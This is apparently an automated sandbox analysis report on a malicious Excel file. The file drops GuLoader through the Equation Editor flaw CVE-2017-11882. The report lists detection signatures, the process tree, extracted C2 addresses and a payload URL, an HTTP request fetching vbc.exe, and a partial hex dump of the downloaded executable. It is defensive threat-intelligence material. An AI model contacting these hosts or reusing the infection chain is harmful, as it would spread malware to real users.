Play interactive tour

Edit tour

Windows Analysis Report ORDER.xlsx

Overview

General Information

Sample Name:	ORDER.xlsx
Analysis ID:	482999
MD5:	c82cca02226f7910cd552124c3cf6e7f
SHA1:	79214e25d81860d25a8e88df99d487394c029da1
SHA256:	5a9f905842cac5fabeb0719527960d0ff67d2c5fc88f163b4f2dcbb366fac62f
Tags:	GuLoaderVelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected GuLoader

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to call native functions

Downloads executable code via HTTP

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2024 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 2644 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 984 cmdline: 'C:\Users\Public\vbc.exe' MD5: 4E7BC50BF6D2B8EF86A4C4926E049AD9)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://37.0.11.217/WEALTHYREM_ecIAnTt143.bin"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 212.192.246.25, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2644, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2644, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2644, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 984

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://37.0.11.217/WEALTHYREM_ecIAnTt143.bin"}

Multi AV Scanner detection for submitted file

Show sources

Source: ORDER.xlsx	Virustotal: Detection: 28%			Perma Link
Source: ORDER.xlsx	ReversingLabs: Detection: 25%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 67MB

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://37.0.11.217/WEALTHYREM_ecIAnTt143.bin

Source: Joe Sandbox View

ASN Name: RHC-HOSTINGGB RHC-HOSTINGGB

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 14 Sep 2021 10:13:58 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29Last-Modified: Mon, 13 Sep 2021 22:47:50 GMTETag: "21000-5cbe84130fcf7"Accept-Ranges: bytesContent-Length: 135168Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 36 a4 c9 93 57 ca 9a 93 57 ca 9a 93 57 ca 9a 10 4b c4 9a 92 57 ca 9a dc 75 c3 9a 9a 57 ca 9a a5 71 c7 9a 92 57 ca 9a 52 69 63 68 93 57 ca 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b4 95 b4 4a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 b0 01 00 00 90 00 00 00 00 00 00 70 13 00 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 50 02 00 00 10 00 00 c3 37 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 b9 01 00 28 00 00 00 00 10 02 00 3a 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 02 00 00 20 00 00 00 00 10 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 ae 01 00 00 10 00 00 00 b0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 64 45 00 00 00 c0 01 00 00 10 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 3a 3b 00 00 00 10 02 00 00 40 00 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic

HTTP traffic detected: GET /reverse/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 212.192.246.25Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: unknown	TCP traffic detected without corresponding DNS query: 212.192.246.25

Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: ED60BCE4.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000006.00000002.685967623.0000000003447000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ED60BCE4.emf

Jump to behavior

Source: global traffic

System Summary:

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003669E3	6_2_003669E3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B43F	6_2_0036B43F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00363822	6_2_00363822
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B412	6_2_0036B412
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00363008	6_2_00363008
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00365067	6_2_00365067
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00364C64	6_2_00364C64
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00364460	6_2_00364460
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036586D	6_2_0036586D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00369445	6_2_00369445
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B494	6_2_0036B494
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A092	6_2_0036A092
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00363491	6_2_00363491
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00364C9F	6_2_00364C9F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00369C9B	6_2_00369C9B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00365485	6_2_00365485
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B883	6_2_0036B883
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003654F8	6_2_003654F8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00365CE0	6_2_00365CE0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B4D9	6_2_0036B4D9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A538	6_2_0036A538
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B52D	6_2_0036B52D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036391F	6_2_0036391F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036510B	6_2_0036510B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B57C	6_2_0036B57C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00369D66	6_2_00369D66
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036595D	6_2_0036595D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003631BF	6_2_003631BF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003699AD	6_2_003699AD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00369D9B	6_2_00369D9B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00362D83	6_2_00362D83
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003631FB	6_2_003631FB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003651ED	6_2_003651ED
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003699EB	6_2_003699EB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003639D3	6_2_003639D3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003655D3	6_2_003655D3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00365DC0	6_2_00365DC0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00365A3F	6_2_00365A3F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A603	6_2_0036A603
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00362672	6_2_00362672
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00364AB7	6_2_00364AB7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003656BF	6_2_003656BF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003636BB	6_2_003636BB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A6A5	6_2_0036A6A5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003666AE	6_2_003666AE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B6AF	6_2_0036B6AF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036AA94	6_2_0036AA94
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00369A84	6_2_00369A84
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00364AFC	6_2_00364AFC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003632EB	6_2_003632EB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003652D1	6_2_003652D1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00363AC5	6_2_00363AC5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00369ACD	6_2_00369ACD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00364336	6_2_00364336
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A739	6_2_0036A739
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A32B	6_2_0036A32B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00363710	6_2_00363710
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A710	6_2_0036A710
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00365B09	6_2_00365B09
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00369FBF	6_2_00369FBF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00362BBC	6_2_00362BBC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A3BD	6_2_0036A3BD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003643BB	6_2_003643BB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036B7A1	6_2_0036B7A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036A7AB	6_2_0036A7AB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00369B9B	6_2_00369B9B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036938A	6_2_0036938A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00365789	6_2_00365789
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00365BF1	6_2_00365BF1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003623DA	6_2_003623DA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003653C3	6_2_003653C3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003633CF	6_2_003633CF

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003669E3 NtAllocateVirtualMemory,	6_2_003669E3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00366A43 NtAllocateVirtualMemory,	6_2_00366A43
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00366B38 NtAllocateVirtualMemory,	6_2_00366B38

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Source: vbc[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior

Source: ORDER.xlsx	Virustotal: Detection: 28%
Source: ORDER.xlsx	ReversingLabs: Detection: 25%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$ORDER.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVREDE6.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/27@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: vbc.exe, 00000006.00000002.685753074.0000000003260000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00419564 push esi; retn 000Ch	6_2_004196B9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00407A1A push edi; ret	6_2_00407BB6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405CE3 pushad ; ret	6_2_00405CE8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004060E5 push ds; ret	6_2_004060E6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00408903 push edi; retf	6_2_00408906
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00407B8C push edi; ret	6_2_00407BB6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036001A pushad ; retf	6_2_0036001C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0036007A pushad ; retf	6_2_0036007C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00360E7A push 81D7EEE9h; ret	6_2_00360E80
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00362268 push ds; retf	6_2_00362276
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00361B92 push esp; retf	6_2_00361B95
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003603FD pushad ; retf	6_2_003603FE

Source: initial sample	Static PE information: section name: .text entropy: 7.10018192133
Source: initial sample	Static PE information: section name: .text entropy: 7.10018192133

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
